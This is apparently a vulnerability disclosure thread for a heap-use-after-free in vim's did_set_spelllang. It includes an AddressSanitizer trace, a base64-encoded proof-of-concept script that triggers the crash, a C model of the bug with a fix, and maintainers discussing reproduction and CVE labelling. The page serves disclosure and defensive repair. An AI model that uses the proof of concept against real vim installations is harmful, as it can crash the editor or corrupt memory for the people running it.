heap-use-after-free in function did_set_spelllang at spell in vim/vim
Reported on
Oct 30th 2022
Description
heap-use-after-free in function did_set_spelllang
at spell.c:2256:19
vim version
git log -1
commit 03d6e6f42b0deeb02d52c8a48c14abe431370c1c (HEAD -> master, tag: v9.0.0820, origin/master, origin/HEAD)
Proof of Concept
# ~/vim/src/vim -u NONE -X -Z -e -s -S ./poc3 -c ':qa!'
=================================================================
==19583==ERROR: AddressSanitizer: heap-use-after-free on address 0x62500000a120 at pc 0x55ab5727e6b4 bp 0x7ffe2878da30 sp 0x7ffe2878da28
READ of size 8 at 0x62500000a120 thread T0
#0 0x55ab5727e6b3 in did_set_spelllang /root/vim/src/spell.c:2256:19
#1 0x55ab56db52d2 in do_ecmd /root/vim/src/ex_cmds.c:3122:8
#2 0x55ab56bd56f9 in do_argfile /root/vim/src/arglist.c:738:6
#3 0x55ab56dd2de9 in do_one_cmd /root/vim/src/ex_docmd.c:2578:2
#4 0x55ab56dd2de9 in do_cmdline /root/vim/src/ex_docmd.c:990:17
#5 0x55ab57226f23 in do_source_ext /root/vim/src/scriptfile.c:1667:5
#6 0x55ab57224b94 in do_source /root/vim/src/scriptfile.c:1811:12
#7 0x55ab57224b94 in cmd_source /root/vim/src/scriptfile.c:1163:14
#8 0x55ab56dd2de9 in do_one_cmd /root/vim/src/ex_docmd.c:2578:2
#9 0x55ab56dd2de9 in do_cmdline /root/vim/src/ex_docmd.c:990:17
#10 0x55ab575ef049 in exe_commands /root/vim/src/main.c:3135:2
#11 0x55ab575ef049 in vim_main2 /root/vim/src/main.c:781:2
#12 0x55ab575ec33b in main /root/vim/src/main.c:432:12
#13 0x7f4485981d8f (/lib/x86_64-linux-gnu/libc.so.6+0x29d8f) (BuildId: 69389d485a9793dbe873f0ea2c93e02efaa9aa3d)
#14 0x7f4485981e3f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x29e3f) (BuildId: 69389d485a9793dbe873f0ea2c93e02efaa9aa3d)
#15 0x55ab56b0c264 in _start (/root/vim/src/vim+0x1c6264) (BuildId: cc93689526cbfb3ad5bf5cb56efb76f0ae814d34)
0x62500000a120 is located 32 bytes inside of 9168-byte region [0x62500000a100,0x62500000c4d0)
freed by thread T0 here:
#0 0x55ab56b8ee02 in free (/root/vim/src/vim+0x248e02) (BuildId: cc93689526cbfb3ad5bf5cb56efb76f0ae814d34)
#1 0x55ab56be30f1 in apply_autocmds_group /root/vim/src/autocmd.c:2300:6
#2 0x55ab56be5e23 in apply_autocmds /root/vim/src/autocmd.c:1710:12
#3 0x55ab56db52d2 in do_ecmd /root/vim/src/ex_cmds.c:3122:8
#4 0x55ab56bd56f9 in do_argfile /root/vim/src/arglist.c:738:6
previously allocated by thread T0 here:
#0 0x55ab56b8f0ae in __interceptor_malloc (/root/vim/src/vim+0x2490ae) (BuildId: cc93689526cbfb3ad5bf5cb56efb76f0ae814d34)
#1 0x55ab56bca2b8 in lalloc /root/vim/src/alloc.c:246:11
SUMMARY: AddressSanitizer: heap-use-after-free /root/vim/src/spell.c:2256:19 in did_set_spelllang
Shadow bytes around the buggy address:
==19583==ABORTING
Content of poc3 (base64 encoded):
YXUgU3BlbGxGaWxlTWlzc2luZyAqIG4wCnNlIHNwZWxsCmF1IFNwZWxsRmlsZU1pc3NpbmcgKiBi
dwpzbus=
Impact
This vulnerability is capable of crashing software, modifying memory, and possibly remote execution.
Report of the Information Security Laboratory of Ocean University of China @OUC_ISLOUC @OUC_Blue_Whale
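The crash pattern the trace shows (a SpellFileMissing autocommand wiping the buffer that did_set_spelllang is still configuring) and the defensive re-check it calls for, as an added C model that is not vim's code: the buffer list, buf_new, demo and the bufref_T layout are simplified assumptions, and vim's real set_bufref()/bufref_valid() helpers are only imitated here.

```c
#include <stdlib.h>
#include <string.h>
/* Constructed model, not vim's code: a buffer list, the SpellFileMissing hook that
 * may wipe the buffer being configured, and a check like vim's set_bufref()/bufref_valid(). */
typedef struct { int fnum; char spelllang[16]; } buf_T;
typedef struct { buf_T *buf; int fnum; int free_count; } bufref_T;
#define NBUF 4
static buf_T *buflist[NBUF];
static int buf_free_count;      /* bumped on every buffer free */
static int wipe_on_autocmd;     /* models `au SpellFileMissing * bw` */
static buf_T *buf_new(int fnum) {
    buf_T *b = calloc(1, sizeof *b); if (!b) abort();
    b->fnum = fnum;
    for (int i = 0; i < NBUF; i++) if (!buflist[i]) { buflist[i] = b; break; }
    return b;
}
static void buf_wipe(buf_T *b) {
    for (int i = 0; i < NBUF; i++) if (buflist[i] == b) buflist[i] = NULL;
    free(b); buf_free_count++;
}
/* User autocommands run here; with the POC's `bw` the buffer is freed. */
static void apply_spellfilemissing(buf_T *b) { if (wipe_on_autocmd) buf_wipe(b); }
static void set_bufref(bufref_T *r, buf_T *b) {
    r->buf = b; r->fnum = b->fnum; r->free_count = buf_free_count;
}
/* Valid if nothing was freed since, or the same buffer (same fnum) is still listed. */
static int bufref_valid(const bufref_T *r) {
    if (r->free_count == buf_free_count) return 1;
    for (int i = 0; i < NBUF; i++)
        if (buflist[i] == r->buf && buflist[i]->fnum == r->fnum) return 1;
    return 0;
}
/* Hardened did_set_spelllang: take a bufref before the hook and re-check after.
 * Without the bufref_valid() test this is the reported bug: strncpy writes to freed memory. */
static int set_spelllang_safe(buf_T *b, const char *lang) {
    bufref_T ref;
    set_bufref(&ref, b);
    apply_spellfilemissing(b);
    if (!bufref_valid(&ref)) return 0;   /* buffer was wiped: stop here */
    strncpy(b->spelllang, lang, sizeof b->spelllang - 1);
    return 1;
}
/* The POC's sequence: 1 if the option was set, 0 if the buffer vanished. */
static int demo(int wipe) {
    buf_T *b = buf_new(wipe ? 2 : 1);
    wipe_on_autocmd = wipe;
    int rc = set_spelllang_safe(b, "xy");
    if (rc) buf_wipe(b);                 /* free the surviving buffer */
    return rc;
}
```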
I tried with valgrind, but I cannot reproduce the problem. Is it correct that the last bytes in the POC file are: 0a73 6eeb? It ends in an illegal byte; I doubt that matters for reproducing the problem.
Yes, the POC does end with those bytes.
$ hexdump poc
0000000 7561 5320 6570 6c6c 6946 656c 694d 7373
0000010 6e69 2067 202a 306e 730a 2065 7073 6c65
0000020 0a6c 7561 5320 6570 6c6c 6946 656c 694d
0000030 7373 6e69 2067 202a 7762 730a eb6e
000003e
I can still reproduce it on the latest version (commit cf2594fbf34d9a6776bd9d33f845cb8ceb1e1cd0). These are the output logs of valgrind and AFL++:
These POCs can also reproduce this problem: vim-pocs-3.tar.gz
I managed to reproduce by adding this line at the top of the POC: set spelllang=xy
@Pavlos, why are the recent vim bugs that are marked as "This vulnerability will not receive a CVE" receiving CVEs?
Did Bram label these as bugs and not as security vulnerabilities? If so, giving a non-security bug a CVE is inappropriate.